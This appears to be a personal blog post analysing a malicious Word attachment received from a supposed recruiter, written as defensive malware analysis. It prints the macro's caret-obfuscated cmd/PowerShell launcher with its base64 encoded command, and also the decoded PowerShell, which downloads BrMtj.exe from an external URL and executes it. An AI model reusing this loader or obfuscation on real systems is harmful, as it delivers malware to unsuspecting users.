Microsoft word document malware analysis


I had emailed a recruiter last year for a job opportunity. He reverted back year later with attachment and it was encrypted and provided password.

Email

Unzipped and looked for the properties of word document.

Email3

I analysed file using Oletools  and the result showed it as a suspicious file.

Email4

I found value (“1jwe7d7n1544”) in the Macro code (which is highlighted in yellow).

Email5

After debugging macro from word document, I got base64 string (below the screenshot).

Email6.PNG

cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAiACkAewANAAoAIAAgACAAIAAgAHQAcgB5AHsADQAKACAAIAAgACAAIAAkAHUAcgBpACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAIgBoAHQAdABwADoALwAvAHYAZQB1AGwAYQBsAG0AZgBmAHkAeQAuAGMAbwBtAHAAYQBuAHkALwBwAHUAZQB3AHAAeABtAGEAcwBsAC8AcwB1AG8AZQBwAHcAeABwAGEAbQB4AGEAcAB4AGwAYQBtAHMAbAB4AGQAbwAuAHAAaABwAD8AbAA9AHMAawBsAGkAbQBmADUALgBoAGEAcgB6ACIAKQANAAoAIAAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlACAAPQAgACQAbQAuAEkAbgB2AG8AawBlACgAJABpAG4AcwB0AGEAbgBjAGUALAAgACgAJAB1AHIAaQApACkAOwANAAoADQAKACAAIAAgACAAIAAkAHAAYQB0AGgAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAIgBDAG8AbQBtAG8AbgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ARABhAHQAYQAiACkAIAArACAAIgBcAFwAQgByAE0AdABqAC4AZQB4AGUAIgA7AA0ACgAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAcABhAHQAaAAsACAAJAByAGUAcwBwAG8AbgBzAGUAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAYwBsAHMAaQBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABHAHUAaQBkACAAJwBDADAAOABBAEYARAA5ADAALQBGADIAQQAxAC0AMQAxAEQAMQAtADgANAA1ADUALQAwADAAQQAwAEMAOQAxAEYAMwA4ADgAMAAnAA0ACgAgACAAIAAgACAAJAB0AHkAcABlACAAPQAgAFsAVAB5AHAAZQBdADoAOgBHAGUAdABUAHkAcABlAEYAcgBvAG0AQwBMAFMASQBEACgAJABjAGwAcwBpAGQAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQAIAA9ACAAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAHQAeQBwAGUAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQALgBEAG8AYwB1AG0AZQBuAHQALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACQAcABhAHQAaAAsACQAbgB1AGwALAAgACQAbgB1AGwALAAgACQAbgB1AGwALAAwACkADQAKAA0ACgAgACAAIAAgACAAfQBjAGEAdABjAGgAewB9AA0ACgAgACAAIAAgACAADQAKACAAIAB9AA0ACgB9AA0ACgANAAoARQB4AGkAdAA7AA0ACgANAAoA 

Converting base64 string, resulted in the below PowerShell code.

$instance = [System.Activator]::CreateInstance(“System.Net.WebClient”);
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq “DownloadData”){
try{
$uri = New-Object System.Uri(“http:// veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz”)
$response = $m.Invoke($instance, ($uri));
$path = [System.Environment]::GetFolderPath(“CommonApplicationData”) + “\\BrMtj.exe”;
[System.IO.File]::WriteAllBytes($path, $response);
$clsid = New-Object Guid ‘C08AFD90-F2A1-11D1-8455-00A0C91F3880’
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;

Behavior of Macro — 

  • Executes when word document opens.

Behavior of PowerShell script —

  • PowerShell script access URL  (http:// veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz)
  • It downloads executable file BrMtj.exe

Note: When i tried to access URL in browser, it was inaccessible.

Malware Sample on Virus Total — 

SHA256 — e4a959684cd6ea7248dc4d2ad0d5df2790ff217685c2a341d242a85b5808d720

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.